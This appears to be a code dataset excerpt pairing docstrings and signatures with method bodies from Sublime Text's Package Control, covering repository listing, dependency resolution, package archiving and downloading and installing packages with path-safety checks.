desc
stringlengths 3
26.7k
| decl
stringlengths 11
7.89k
| bodies
stringlengths 8
553k
|
---|---|---|
def get_metadata(self, package, is_dependency=False):
    """
    Returns the package metadata for an installed package

    :param package:
        The name of the package

    :param is_dependency:
        If the metadata is for a dependency

    :return:
        A dict with the keys:
            version
            url
            description
        or an empty dict on error
    """

    filename = 'dependency-metadata.json' if is_dependency else 'package-metadata.json'

    if not package_file_exists(package, filename):
        return {}

    raw_json = read_package_file(package, filename)
    if not raw_json:
        return {}

    try:
        return json.loads(raw_json)
    except ValueError:
        console_write(u'\n An error occurred while trying to parse the package\n metadata for %s.\n ', package)
    return {}
|
def get_dependencies(self, package):
    """
    Returns a list of dependencies for the specified package on the
    current machine

    :param package:
        The name of the package

    :return:
        A list of dependency names
    """

    if package_file_exists(package, 'dependencies.json'):
        raw_json = read_package_file(package, 'dependencies.json')
        if raw_json:
            try:
                return self.select_dependencies(json.loads(raw_json))
            except ValueError:
                console_write(u'\n An error occurred while trying to parse the\n dependencies.json for %s.\n ', package)

    # No usable dependencies.json - fall back to the recorded metadata
    metadata = self.get_metadata(package)
    if metadata:
        return metadata.get('dependencies', [])

    return []
|
def get_dependency_priority_code(self, dependency):
    """
    Returns the priority and loader code for a dependency that is already
    on disk.

    This is primarily only useful when a package author has a
    dependency they are developing locally and Package Control needs to
    know how to set up a loader for it.

    :param dependency:
        A unicode string of the dependency to get the info for

    :return:
        A 2-element tuple of unicode strings (priority, python code). Return
        value will be (None, None) if the dependency was not found on disk.
    """

    dependency_path = self.get_package_dir(dependency)
    if not os.path.exists(dependency_path):
        return (None, None)

    available = self.list_available_dependencies()

    hidden_file_path = os.path.join(dependency_path, '.sublime-dependency')
    loader_py_path = os.path.join(dependency_path, 'loader.py')
    loader_code_path = os.path.join(dependency_path, 'loader.code')

    # Prefer the load_order published for the dependency; otherwise fall
    # back to the .sublime-dependency marker file contents
    priority = None
    if dependency in available:
        priority = available[dependency].get('load_order')
    elif os.path.exists(hidden_file_path):
        with open(hidden_file_path, 'rb') as f:
            data = f.read().decode('utf-8').strip()
        if data.isdigit():
            priority = data
            # Zero-pad single digits so priorities sort lexicographically
            if len(priority) == 1:
                priority = '0' + priority

    if priority is None:
        priority = '50'

    # loader.code takes precedence over loader.py when both exist
    code = None
    has_py_loader = os.path.exists(loader_py_path)
    has_code_loader = os.path.exists(loader_code_path)
    if has_py_loader or has_code_loader:
        chosen_path = loader_code_path if has_code_loader else loader_py_path
        with open(chosen_path, 'rb') as f:
            code = f.read().decode('utf-8')

    return (priority, code)
|
':param package:
The package name
:return:
If the package is installed via git'
| def _is_git_package(self, package):
| git_dir = os.path.join(self.get_package_dir(package), '.git')
return (os.path.exists(git_dir) and (os.path.isdir(git_dir) or os.path.isfile(git_dir)))
|
':param package:
The package name
:return:
If the package is installed via hg'
| def _is_hg_package(self, package):
| hg_dir = os.path.join(self.get_package_dir(package), '.hg')
return (os.path.exists(hg_dir) and os.path.isdir(hg_dir))
|
def is_vcs_package(self, package):
    """
    If the package is installed via git or hg

    :param package:
        The package to check

    :return:
        bool
    """

    if self._is_git_package(package):
        return True
    return self._is_hg_package(package)
|
def get_version(self, package):
    """
    Determines the current version for a package

    :param package:
        The package name

    :return:
        A unicode version string, a "<vcs> commit <hash>" string for
        VCS-managed packages without metadata, or 'unknown version'
    """

    metadata_version = self.get_metadata(package).get('version')
    if metadata_version:
        return metadata_version

    # No recorded metadata - for VCS checkouts report the latest commit
    if self.is_vcs_package(package):
        upgrader = self.instantiate_upgrader(package)
        commit = upgrader.latest_commit()
        if commit:
            return '%s commit %s' % (upgrader.cli_name, commit)

    return 'unknown version'
|
def instantiate_upgrader(self, package):
    """
    Creates an HgUpgrader or GitUpgrader object to run operations on a VCS-
    based package

    :param package:
        The name of the package

    :return:
        GitUpgrader, HgUpgrader or None
    """

    if self._is_git_package(package):
        return GitUpgrader(
            self.settings['git_binary'],
            self.settings['git_update_command'],
            self.get_package_dir(package),
            self.settings['cache_length'],
            self.settings['debug']
        )

    if self._is_hg_package(package):
        return HgUpgrader(
            self.settings['hg_binary'],
            self.settings['hg_update_command'],
            self.get_package_dir(package),
            self.settings['cache_length'],
            self.settings['debug']
        )

    return None
|
def select_dependencies(self, dependency_info):
    """
    Takes the dict from a dependencies.json file and returns the
    dependency names that are applicable to the current machine

    :param dependency_info:
        A dict from a dependencies.json file

    :return:
        A list of dependency names
    """

    # Most specific selector first: "platform-arch", then "platform",
    # then the wildcard
    selectors = [
        self.settings['platform'] + '-' + self.settings['arch'],
        self.settings['platform'],
        '*'
    ]

    for selector in selectors:
        if selector not in dependency_info:
            continue
        version_map = dependency_info[selector]
        # Newest version selector wins among the compatible ones
        for version_selector in sorted(version_map.keys(), reverse=True):
            if is_compatible_version(version_selector):
                return version_map[version_selector]

    return []
|
def list_repositories(self):
    """
    Returns a master list of all repositories pulled from all sources

    These repositories come from the channels specified in the
    "channels" setting, plus any repositories listed in the
    "repositories" setting.

    :return:
        A list of all available repositories
    """

    cache_ttl = self.settings.get('cache_length')
    # Copy the list so the setting itself is not mutated below
    repositories = self.settings.get('repositories')[:]
    channels = self.settings.get('channels')
    updated_channels = []
    found_default = False
    # Normalize the channel list: drop known-malicious hosts and collapse
    # any legacy default-channel URLs into the single current default
    for channel in channels:
        if re.match('https?://([^.]+\\.)*package-control.io', channel):
            console_write(('Removed malicious channel %s' % channel))
            continue
        if (channel in OLD_DEFAULT_CHANNELS):
            if (not found_default):
                updated_channels.append(DEFAULT_CHANNEL)
                found_default = True
            continue
        updated_channels.append(channel)
    for channel in updated_channels:
        channel = channel.strip()
        cache_key = (channel + '.repositories')
        channel_repositories = get_cache(cache_key)
        # Merge any previously-cached per-channel info into the settings
        merge_cache_under_settings(self, 'package_name_map', channel)
        merge_cache_under_settings(self, 'renamed_packages', channel)
        merge_cache_under_settings(self, 'unavailable_packages', channel, list_=True)
        merge_cache_under_settings(self, 'unavailable_dependencies', channel, list_=True)
        if (channel_repositories is None):
            # Cache miss - pick the first provider that understands this
            # channel URL and fetch everything fresh
            for provider_class in CHANNEL_PROVIDERS:
                if provider_class.match_url(channel):
                    provider = provider_class(channel, self.settings)
                    break
            try:
                channel_repositories = provider.get_repositories()
                set_cache(cache_key, channel_repositories, cache_ttl)
                unavailable_packages = []
                unavailable_dependencies = []
                for repo in channel_repositories:
                    # Keep only releases usable on this platform/version,
                    # caching the filtered result per repository
                    original_packages = provider.get_packages(repo)
                    filtered_packages = {}
                    for package in original_packages:
                        info = original_packages[package]
                        info['releases'] = filter_releases(package, self.settings, info['releases'])
                        if info['releases']:
                            filtered_packages[package] = info
                        else:
                            unavailable_packages.append(package)
                    packages_cache_key = (repo + '.packages')
                    set_cache(packages_cache_key, filtered_packages, cache_ttl)
                    # Same filtering for the repository's dependencies
                    original_dependencies = provider.get_dependencies(repo)
                    filtered_dependencies = {}
                    for dependency in original_dependencies:
                        info = original_dependencies[dependency]
                        info['releases'] = filter_releases(dependency, self.settings, info['releases'])
                        if info['releases']:
                            filtered_dependencies[dependency] = info
                        else:
                            unavailable_dependencies.append(dependency)
                    dependencies_cache_key = (repo + '.dependencies')
                    set_cache(dependencies_cache_key, filtered_dependencies, cache_ttl)
                name_map = provider.get_name_map()
                set_cache_under_settings(self, 'package_name_map', channel, name_map, cache_ttl)
                renamed_packages = provider.get_renamed_packages()
                set_cache_under_settings(self, 'renamed_packages', channel, renamed_packages, cache_ttl)
                set_cache_under_settings(self, 'unavailable_packages', channel, unavailable_packages, cache_ttl, list_=True)
                set_cache_under_settings(self, 'unavailable_dependencies', channel, unavailable_dependencies, cache_ttl, list_=True)
            except (DownloaderException, ClientException, ProviderException) as e:
                # One failed channel should not abort listing the rest
                console_write(e)
                continue
        repositories.extend(channel_repositories)
    return [repo.strip() for repo in repositories]
|
def _list_available(self):
    """
    Returns a master list of every available package and dependency from
    all sources

    :return:
        A 2-element tuple, in the format:
        (
            {
                'Package Name': {
                    # Package details - see example-repository.json for format
                },
                ...
            },
            {
                'Dependency Name': {
                    # Dependency details - see example-repository.json for format
                },
                ...
            }
        )
    """

    if self.settings.get('debug'):
        console_write(
            u'\n Fetching list of available packages and dependencies\n Platform: %s-%s\n Sublime Text Version: %s\n Package Control Version: %s\n ',
            (self.settings['platform'], self.settings['arch'], self.settings['version'], __version__)
        )

    cache_ttl = self.settings.get('cache_length')
    repositories = self.list_repositories()
    packages = {}
    dependencies = {}
    bg_downloaders = {}
    active = []
    repos_to_download = []
    name_map = self.settings.get('package_name_map', {})

    # Repositories are processed in reverse so that entries listed earlier
    # take precedence when dict.update() overwrites duplicate names
    for repo in repositories[::-1]:
        if re.match('https?://([^.]+\\.)*package-control.io', repo):
            console_write(('Removed malicious repository %s' % repo))
            continue

        cache_key = repo + '.packages'
        repository_packages = get_cache(cache_key)

        if repository_packages is not None:
            packages.update(repository_packages)

            cache_key = repo + '.dependencies'
            repository_dependencies = get_cache(cache_key)
            # Bug fix: the dependencies cache may be empty/expired even when
            # the packages cache hit - dict.update(None) raises TypeError
            if repository_dependencies is not None:
                dependencies.update(repository_dependencies)
        else:
            # Not cached - queue a background download, one downloader per host
            domain = urlparse(repo).hostname
            if domain not in bg_downloaders:
                bg_downloaders[domain] = BackgroundDownloader(self.settings, REPOSITORY_PROVIDERS)
            bg_downloaders[domain].add_url(repo)
            repos_to_download.append(repo)

    for bg_downloader in list(bg_downloaders.values()):
        bg_downloader.start()
        active.append(bg_downloader)

    # Wait for all of the downloaders to finish
    while active:
        bg_downloader = active.pop()
        bg_downloader.join()

    for repo in repos_to_download:
        domain = urlparse(repo).hostname
        bg_downloader = bg_downloaders[domain]

        provider = bg_downloader.get_provider(repo)
        if not provider:
            continue

        unavailable_packages = []
        unavailable_dependencies = []

        # Apply the name map and drop releases that do not work on this
        # platform/Sublime Text version
        repository_packages = {}
        for name, info in provider.get_packages():
            name = name_map.get(name, name)
            info['name'] = name
            info['releases'] = filter_releases(name, self.settings, info['releases'])
            if info['releases']:
                repository_packages[name] = info
            else:
                unavailable_packages.append(name)

        repository_dependencies = {}
        for name, info in provider.get_dependencies():
            info['releases'] = filter_releases(name, self.settings, info['releases'])
            if info['releases']:
                repository_dependencies[name] = info
            else:
                unavailable_dependencies.append(name)

        # Surface any errors the provider collected while fetching
        for url, exception in provider.get_failed_sources():
            console_write(exception)
        for name, exception in provider.get_broken_packages():
            console_write(exception)
        for name, exception in provider.get_broken_dependencies():
            console_write(exception)

        cache_key = repo + '.packages'
        set_cache(cache_key, repository_packages, cache_ttl)
        packages.update(repository_packages)

        cache_key = repo + '.dependencies'
        set_cache(cache_key, repository_dependencies, cache_ttl)
        dependencies.update(repository_dependencies)

        renamed_packages = provider.get_renamed_packages()
        set_cache_under_settings(self, 'renamed_packages', repo, renamed_packages, cache_ttl)
        set_cache_under_settings(self, 'unavailable_packages', repo, unavailable_packages, cache_ttl, list_=True)
        set_cache_under_settings(self, 'unavailable_dependencies', repo, unavailable_dependencies, cache_ttl, list_=True)

    return (packages, dependencies)
|
def list_available_dependencies(self):
    """
    Returns a master list of every available dependency from all sources

    :return:
        A dict in the format:
        {
            'Dependency Name': {
                # Dependency details - see example-repository.json for format
            },
            ...
        }
    """

    packages, dependencies = self._list_available()
    return dependencies
|
def list_available_packages(self):
    """
    Returns a master list of every available package from all sources

    :return:
        A dict in the format:
        {
            'Package Name': {
                # Package details - see example-repository.json for format
            },
            ...
        }
    """

    packages, dependencies = self._list_available()
    return packages
|
def list_packages(self, unpacked_only=False):
    """
    :param unpacked_only:
        Only list packages that are not inside of .sublime-package files

    :return:
        A list of all installed, non-default, non-dependency, package names
    """

    package_names = self._list_visible_dirs(self.settings['packages_path'])

    # On ST3+ packages may also live as .sublime-package files
    if self.settings['version'] > 3000 and unpacked_only is False:
        package_names |= self._list_sublime_package_files(self.settings['installed_packages_path'])

    excluded = set(self.list_default_packages())
    excluded |= set(self.list_dependencies())
    excluded |= {'User', 'Default'}

    return sorted(package_names - excluded, key=lambda s: s.lower())
|
def list_dependencies(self):
    """
    :return:
        A list of all installed dependency names
    """

    output = []

    # The loader package only exists when running under Python 3
    if sys.version_info >= (3,):
        output.append('0_package_control_loader')

    output.extend(
        name
        for name in self._list_visible_dirs(self.settings['packages_path'])
        if self._is_dependency(name)
    )

    return sorted(output, key=lambda s: s.lower())
|
def list_unloaded_dependencies(self):
    """
    :return:
        A list of the names of dependencies in the Packages/ folder that
        are not currently being loaded
    """

    packages_path = self.settings['packages_path']
    unloaded = []
    for name in self._list_visible_dirs(packages_path):
        marker = os.path.join(packages_path, name, '.sublime-dependency')
        # Only dirs carrying the dependency marker are candidates
        if not os.path.exists(marker):
            continue
        if not loader.exists(name):
            unloaded.append(name)
    return unloaded
|
def list_all_packages(self):
    """
    Lists all packages on the machine

    :return:
        A list of all installed package names, including default packages
    """

    names = self.list_default_packages() + self.list_packages()
    return sorted(names, key=lambda s: s.lower())
|
def list_default_packages(self):
    """
    :return:
        A list of all default package names
    """

    if self.settings['version'] > 3000:
        # ST3+ bundles its default packages next to the executable
        app_dir = os.path.dirname(sublime.executable_path())
        packages = self._list_sublime_package_files(os.path.join(app_dir, 'Packages'))
    else:
        # ST2 keeps pristine copies; anything pristine that is not in
        # Installed Packages is a default package
        config_dir = os.path.dirname(self.settings['packages_path'])
        pristine_files = self._list_sublime_package_files(os.path.join(config_dir, 'Pristine Packages'))
        installed_files = self._list_sublime_package_files(self.settings['installed_packages_path'])
        packages = pristine_files - installed_files

    return sorted(packages - {'User', 'Default'}, key=lambda s: s.lower())
|
'Return a set of directories in the folder specified that are not
hidden and are not marked to be removed
:param path:
The folder to list the directories inside of
:return:
A set of directory names'
| def _list_visible_dirs(self, path):
| output = set()
for filename in os.listdir(path):
if (filename[0] == '.'):
continue
file_path = os.path.join(path, filename)
if (not os.path.isdir(file_path)):
continue
if os.path.exists(os.path.join(file_path, 'package-control.cleanup')):
continue
output.add(filename)
return output
|
'Return a set of all .sublime-package files in a folder
:param path:
The directory to look in for .sublime-package files
:return:
A set of the package names - i.e. with the .sublime-package suffix removed'
| def _list_sublime_package_files(self, path):
| output = set()
if (not os.path.exists(path)):
return output
for filename in os.listdir(path):
if (not re.search('\\.sublime-package$', filename)):
continue
output.add(filename.replace('.sublime-package', ''))
return output
|
'Checks if a package specified is a dependency
:param name:
The name of the package to check if it is a dependency
:return:
Bool, if the package is a dependency'
| def _is_dependency(self, name):
| metadata_path = os.path.join(self.settings['packages_path'], name, 'dependency-metadata.json')
hidden_path = os.path.join(self.settings['packages_path'], name, '.sublime-dependency')
return (os.path.exists(metadata_path) or os.path.exists(hidden_path))
|
def find_required_dependencies(self, ignore_package=None):
    """
    Find all of the dependencies required by the installed packages,
    ignoring the specified package.

    :param ignore_package:
        The package to ignore when enumerating dependencies

    :return:
        A list of the dependencies required by the installed packages
    """

    required = {'0_package_control_loader'}

    for package in self.list_packages():
        if package == ignore_package:
            continue
        required.update(self.get_dependencies(package))

    # Locally-developed dependencies carry the hidden marker but have no
    # metadata; these are always considered required
    packages_path = self.settings['packages_path']
    for name in self._list_visible_dirs(packages_path):
        has_metadata = os.path.exists(os.path.join(packages_path, name, 'dependency-metadata.json'))
        has_marker = os.path.exists(os.path.join(packages_path, name, '.sublime-dependency'))
        if not has_metadata and has_marker:
            required.add(name)

    return sorted(required, key=lambda s: s.lower())
|
def get_package_dir(self, package):
    """
    :return:
        The full filesystem path to the package directory
    """

    packages_path = self.settings['packages_path']
    return os.path.join(packages_path, package)
|
def get_mapped_name(self, package):
    """
    :return:
        The name of the package after passing through mapping rules
    """

    name_map = self.settings.get('package_name_map', {})
    return name_map.get(package, package)
|
def create_package(self, package_name, package_destination, profile=None):
    """
    Creates a .sublime-package file from the running Packages directory

    :param package_name:
        The package to create a .sublime-package file for

    :param package_destination:
        The full filesystem path of the directory to save the new
        .sublime-package file in.

    :param profile:
        If None, the "dirs_to_ignore", "files_to_ignore", "files_to_include"
        and "package_destination" settings will be used when creating the
        package. If a string, will look in the "package_profiles" setting
        and use the profile name to select a sub-dictionary which may
        contain all of the ignore/include settings.

    :return:
        bool if the package file was successfully created
    """

    package_dir = self.get_package_dir(package_name)
    if (not os.path.exists(package_dir)):
        show_error(u'\n The folder for the package name specified, %s,\n does not exists in %s\n ', (package_name, self.settings['packages_path']))
        return False
    package_filename = (package_name + '.sublime-package')
    package_path = os.path.join(package_destination, package_filename)
    if (not os.path.exists(self.settings['installed_packages_path'])):
        os.mkdir(self.settings['installed_packages_path'])
    # Replace any previously-built archive
    if os.path.exists(package_path):
        os.remove(package_path)
    try:
        package_file = zipfile.ZipFile(package_path, 'w', compression=zipfile.ZIP_DEFLATED)
    except (OSError, IOError) as e:
        show_error(u'\n An error occurred creating the package file %s in %s.\n\n %s\n ', (package_filename, package_destination, unicode_from_os(e)))
        return False
    if (self.settings['version'] >= 3000):
        # ST3 expects legacy-layout .pyc files alongside the sources
        compileall.compile_dir(package_dir, quiet=True, legacy=True, optimize=2)
    if profile:
        # NOTE(review): assumes the profile name exists under
        # "package_profiles" - a missing profile yields None here
        profile_settings = self.settings.get('package_profiles').get(profile)

    def get_profile_setting(setting, default):
        # Profile values override the global setting of the same name
        if profile:
            profile_value = profile_settings.get(setting)
            if (profile_value is not None):
                return profile_value
        return self.settings.get(setting, default)

    dirs_to_ignore = get_profile_setting('dirs_to_ignore', [])
    files_to_ignore = get_profile_setting('files_to_ignore', [])
    files_to_include = get_profile_setting('files_to_include', [])
    # Build a regex that strips the package dir prefix (with trailing slash)
    # from each walked path, producing archive-relative paths
    slash = ('\\' if (os.name == 'nt') else '/')
    trailing_package_dir = ((package_dir + slash) if (package_dir[(-1)] != slash) else package_dir)
    package_dir_regex = re.compile(('^' + re.escape(trailing_package_dir)))
    for (root, dirs, files) in os.walk(package_dir):
        # Prune ignored dirs in place so os.walk does not descend into them
        dirs[:] = [x for x in dirs if (x not in dirs_to_ignore)]
        paths = dirs
        paths.extend(files)
        for path in paths:
            full_path = os.path.join(root, path)
            relative_path = re.sub(package_dir_regex, '', full_path)
            ignore_matches = [fnmatch(relative_path, p) for p in files_to_ignore]
            include_matches = [fnmatch(relative_path, p) for p in files_to_include]
            # files_to_include wins over files_to_ignore
            if (any(ignore_matches) and (not any(include_matches))):
                continue
            if os.path.isdir(full_path):
                continue
            package_file.write(full_path, relative_path)
    package_file.close()
    return True
|
def install_package(self, package_name, is_dependency=False):
    """
    Downloads and installs (or upgrades) a package

    Uses the self.list_available_packages() method to determine where to
    retrieve the package file from.

    The install process consists of:

    1. Finding the package
    2. Downloading the .sublime-package/.zip file
    3. Extracting the package file
    4. Showing install/upgrade messaging
    5. Submitting usage info
    6. Recording that the package is installed

    :param package_name:
        The package to download and install

    :param is_dependency:
        If the package is a dependency

    :return:
        bool if the package was successfully installed or None
        if the package needs to be cleaned up on the next restart
        and should not be reenabled
    """

    if is_dependency:
        packages = self.list_available_dependencies()
    else:
        packages = self.list_available_packages()
    is_available = (package_name in list(packages.keys()))
    unavailable_key = 'unavailable_packages'
    if is_dependency:
        unavailable_key = 'unavailable_dependencies'
    is_unavailable = (package_name in self.settings.get(unavailable_key, []))
    package_type = 'package'
    if is_dependency:
        package_type = 'dependency'
    # "Unavailable" means it exists but has no release for this
    # platform/version; a missing dependency of that kind is non-fatal
    if (is_unavailable and (not is_available)):
        console_write(u'\n The %s "%s" is either not available on this platform or for\n this version of Sublime Text\n ', (package_type, package_name))
        if is_dependency:
            return True
        return False
    if (not is_available):
        message = u"The %s '%s' is not available"
        params = (package_type, package_name)
        if is_dependency:
            console_write(message, params)
        else:
            show_error(message, params)
        return False
    # Releases are pre-sorted; the first entry is the newest usable one
    release = packages[package_name]['releases'][0]
    have_installed_dependencies = False
    if (not is_dependency):
        # Install the release's declared dependencies first
        dependencies = release.get('dependencies', [])
        if dependencies:
            if (not self.install_dependencies(dependencies)):
                return False
            have_installed_dependencies = True
    url = release['url']
    package_filename = (package_name + '.sublime-package')
    tmp_dir = tempfile.mkdtemp(u'')
    try:
        # This is refers to the zipfile later on, so we define it here so
        # it can be closed in the finally clause
        package_zip = None
        tmp_package_path = os.path.join(tmp_dir, package_filename)
        unpacked_package_dir = self.get_package_dir(package_name)
        package_path = os.path.join(self.settings['installed_packages_path'], package_filename)
        pristine_package_path = os.path.join(os.path.dirname(self.settings['packages_path']), 'Pristine Packages', package_filename)
        # VCS checkouts are updated via the VCS, never re-downloaded
        if self.is_vcs_package(package_name):
            upgrader = self.instantiate_upgrader(package_name)
            to_ignore = self.settings.get('ignore_vcs_packages')
            if (to_ignore is True):
                show_error(u'\n Skipping %s package %s since the setting\n "ignore_vcs_packages" is set to true\n ', (upgrader.cli_name, package_name))
                return False
            if (isinstance(to_ignore, list) and (package_name in to_ignore)):
                show_error(u'\n Skipping %s package %s since it is listed in the\n "ignore_vcs_packages" setting\n ', (upgrader.cli_name, package_name))
                return False
            result = upgrader.run()
            if ((result is True) and is_dependency):
                (load_order, loader_code) = self.get_dependency_priority_code(package_name)
                loader.add_or_update(load_order, package_name, loader_code)
            return result
        old_version = self.get_metadata(package_name, is_dependency=is_dependency).get('version')
        is_upgrade = (old_version is not None)
        # Download the release into the temp dir
        try:
            with downloader(url, self.settings) as manager:
                package_bytes = manager.fetch(url, 'Error downloading package.')
        except DownloaderException as e:
            console_write(e)
            show_error(u'\n Unable to download %s. Please view the console for\n more details.\n ', package_name)
            return False
        with open_compat(tmp_package_path, 'wb') as package_file:
            package_file.write(package_bytes)
        try:
            package_zip = zipfile.ZipFile(tmp_package_path, 'r')
        except zipfile.BadZipfile:
            show_error(u'\n An error occurred while trying to unzip the package file\n for %s. Please try installing the package again.\n ', package_name)
            return False
        # Scan the archive: detect a single root folder to strip, and
        # reject entries that would escape the package dir
        root_level_paths = []
        last_path = None
        for path in package_zip.namelist():
            try:
                if (not isinstance(path, str_cls)):
                    path = path.decode('utf-8', 'strict')
            except UnicodeDecodeError:
                console_write(u'\n One or more of the zip file entries in %s is not\n encoded using UTF-8, aborting\n ', package_name)
                return False
            last_path = path
            if (path.find('/') in [(len(path) - 1), (-1)]):
                root_level_paths.append(path)
            # Zip-slip / absolute-path protection
            if ((path[0] == '/') or (path.find('../') != (-1)) or (path.find('..\\') != (-1))):
                show_error(u'\n The package specified, %s, contains files outside of\n the package dir and cannot be safely installed.\n ', package_name)
                return False
        if (last_path and (len(root_level_paths) == 0)):
            root_level_paths.append(last_path[0:(last_path.find('/') + 1)])
        skip_root_dir = ((len(root_level_paths) == 1) and root_level_paths[0].endswith('/'))
        dependencies_path = 'dependencies.json'
        no_package_file_zip_path = '.no-sublime-package'
        if skip_root_dir:
            dependencies_path = (root_level_paths[0] + dependencies_path)
            no_package_file_zip_path = (root_level_paths[0] + no_package_file_zip_path)
        # Decide whether to unpack into Packages/ or keep as a
        # .sublime-package file (ST3+ only, unless the package opts out)
        unpack = True
        if (self.settings['version'] >= 3000):
            unpack = False
            try:
                package_zip.getinfo(no_package_file_zip_path)
                unpack = True
            except KeyError:
                pass
        if is_dependency:
            unpack = True
        # If the channel info did not list dependencies, honor the
        # dependencies.json shipped inside the archive
        if ((not is_dependency) and (not have_installed_dependencies)):
            try:
                dep_info_json = package_zip.read(dependencies_path)
                try:
                    dep_info = json.loads(dep_info_json.decode('utf-8'))
                except ValueError:
                    console_write(u'\n An error occurred while trying to parse the\n dependencies.json for %s.\n ', package_name)
                    return False
                dependencies = self.select_dependencies(dep_info)
                if (not self.install_dependencies(dependencies)):
                    return False
            except KeyError:
                # No dependencies.json in the archive
                pass
        metadata_filename = 'package-metadata.json'
        if is_dependency:
            metadata_filename = 'dependency-metadata.json'
        # If upgrading from an unpacked install to a packed one, remove the
        # old unpacked dir (deferring to a restart if files are locked)
        unpacked_metadata_file = os.path.join(unpacked_package_dir, metadata_filename)
        if (os.path.exists(unpacked_metadata_file) and (not unpack)):
            self.backup_package_dir(package_name)
            if (not clear_directory(unpacked_package_dir)):
                reinstall_file = os.path.join(unpacked_package_dir, 'package-control.reinstall')
                open_compat(reinstall_file, 'w').close()
                clear_directory(unpacked_package_dir, [reinstall_file, unpacked_metadata_file])
                show_error(u'\n An error occurred while trying to upgrade %s. Please\n restart Sublime Text to finish the upgrade.\n ', package_name)
                return None
            else:
                os.rmdir(unpacked_package_dir)
        if unpack:
            self.backup_package_dir(package_name)
            package_dir = unpacked_package_dir
        else:
            # Extract into a temp dir first, then re-zip below
            tmp_working_dir = os.path.join(tmp_dir, 'working')
            os.mkdir(tmp_working_dir)
            package_dir = tmp_working_dir
        package_metadata_file = os.path.join(package_dir, metadata_filename)
        if (not os.path.exists(package_dir)):
            os.mkdir(package_dir)
        os.chdir(package_dir)
        # Extract every entry, tracking what was written so stale files
        # from a previous version can be cleared afterwards
        loader_code = None
        overwrite_failed = False
        extracted_paths = []
        for path in package_zip.namelist():
            dest = path
            try:
                if (not isinstance(dest, str_cls)):
                    dest = dest.decode('utf-8', 'strict')
            except UnicodeDecodeError:
                console_write(u'\n One or more of the zip file entries in %s is not\n encoded using UTF-8, aborting\n ', package_name)
                return False
            if (os.name == 'nt'):
                # Characters invalid in Windows filenames
                regex = ':|\\*|\\?|"|<|>|\\|'
                if (re.search(regex, dest) is not None):
                    console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
                    continue
            if skip_root_dir:
                dest = dest[len(root_level_paths[0]):]
            if (os.name == 'nt'):
                dest = dest.replace('/', '\\')
            else:
                dest = dest.replace('\\', '/')
            # Dependency loader code is captured, and loader.py itself is
            # not written to disk
            if (is_dependency and (dest in set(['loader.code', 'loader.py']))):
                loader_code = package_zip.read(path).decode('utf-8')
                if (dest == 'loader.py'):
                    continue
            dest = os.path.join(package_dir, dest)

            def add_extracted_dirs(dir_):
                # Record dir_ and each parent up to package_dir as extracted
                while (dir_ not in extracted_paths):
                    extracted_paths.append(dir_)
                    dir_ = os.path.dirname(dir_)
                    if (dir_ == package_dir):
                        break

            if path.endswith('/'):
                if (not os.path.exists(dest)):
                    os.makedirs(dest)
                add_extracted_dirs(dest)
            else:
                dest_dir = os.path.dirname(dest)
                if (not os.path.exists(dest_dir)):
                    os.makedirs(dest_dir)
                add_extracted_dirs(dest_dir)
                extracted_paths.append(dest)
                try:
                    with open_compat(dest, 'wb') as f:
                        f.write(package_zip.read(path))
                except IOError as e:
                    message = unicode_from_os(e)
                    # Permission denied means a file is locked (e.g. a
                    # loaded .pyd/.dll) - defer the upgrade to a restart
                    if re.search('[Ee]rrno 13', message):
                        overwrite_failed = True
                        break
                    console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
                except UnicodeDecodeError:
                    console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
        package_zip.close()
        package_zip = None
        if overwrite_failed:
            reinstall_file = os.path.join(package_dir, 'package-control.reinstall')
            open_compat(reinstall_file, 'w').close()
            clear_directory(package_dir, [reinstall_file, package_metadata_file])
            show_error(u'\n An error occurred while trying to upgrade %s. Please restart\n Sublime Text to finish the upgrade.\n ', package_name)
            return None
        # Remove files left over from a previous version
        clear_directory(package_dir, extracted_paths)
        new_version = release['version']
        self.print_messages(package_name, package_dir, is_upgrade, old_version, new_version)
        # Record the installed metadata
        with open_compat(package_metadata_file, 'w') as f:
            if is_dependency:
                url = packages[package_name]['issues']
            else:
                url = packages[package_name]['homepage']
            metadata = {'version': new_version, 'sublime_text': release['sublime_text'], 'platforms': release['platforms'], 'url': url, 'description': packages[package_name]['description']}
            if (not is_dependency):
                metadata['dependencies'] = release.get('dependencies', [])
            json.dump(metadata, f)
        # Submit usage info
        if is_upgrade:
            params = {'package': package_name, 'operation': 'upgrade', 'version': new_version, 'old_version': old_version}
        else:
            params = {'package': package_name, 'operation': 'install', 'version': new_version}
        self.record_usage(params)
        if (not is_dependency):
            # Record the install in the settings on the main thread
            def save_names():
                settings = sublime.load_settings(pc_settings_filename())
                original_names = load_list_setting(settings, 'installed_packages')
                names = list(original_names)
                if (package_name not in names):
                    names.append(package_name)
                save_list_setting(settings, pc_settings_filename(), 'installed_packages', names, original_names)
            sublime.set_timeout(save_names, 1)
        else:
            load_order = packages[package_name]['load_order']
            loader.add_or_update(load_order, package_name, loader_code)
        if (not unpack):
            # Re-zip the extracted working dir into the final
            # .sublime-package file
            try:
                os.remove(tmp_package_path)
                package_zip = zipfile.ZipFile(tmp_package_path, 'w', compression=zipfile.ZIP_DEFLATED)
            except (OSError, IOError) as e:
                show_error(u'\n An error occurred creating the package file %s in %s.\n\n %s\n ', (package_filename, tmp_dir, unicode_from_os(e)))
                return False
            package_dir_regex = re.compile(('^' + re.escape(package_dir)))
            for (root, dirs, files) in os.walk(package_dir):
                paths = dirs
                paths.extend(files)
                for path in paths:
                    full_path = os.path.join(root, path)
                    relative_path = re.sub(package_dir_regex, '', full_path)
                    if os.path.isdir(full_path):
                        continue
                    package_zip.write(full_path, relative_path)
            package_zip.close()
            package_zip = None
            # Move the archive into Installed Packages; if it is locked,
            # stage a .sublime-package-new for the next restart
            try:
                if os.path.exists(package_path):
                    os.remove(package_path)
                shutil.move(tmp_package_path, package_path)
            except OSError:
                new_package_path = package_path.replace('.sublime-package', '.sublime-package-new')
                shutil.move(tmp_package_path, new_package_path)
                show_error(u'\n An error occurred while trying to upgrade %s. Please restart\n Sublime Text to finish the upgrade.\n ', package_name)
                return None
        # The pristine copy (ST2) is now stale
        if os.path.exists(pristine_package_path):
            os.remove(pristine_package_path)
        os.chdir(self.settings['packages_path'])
        return True
    finally:
        # Always release the zip handle and clean up the temp dir
        if package_zip:
            package_zip.close()
        sublime.set_timeout((lambda : delete_directory(tmp_dir)), 1000)
|
def install_dependencies(self, dependencies, fail_early=True):
    """
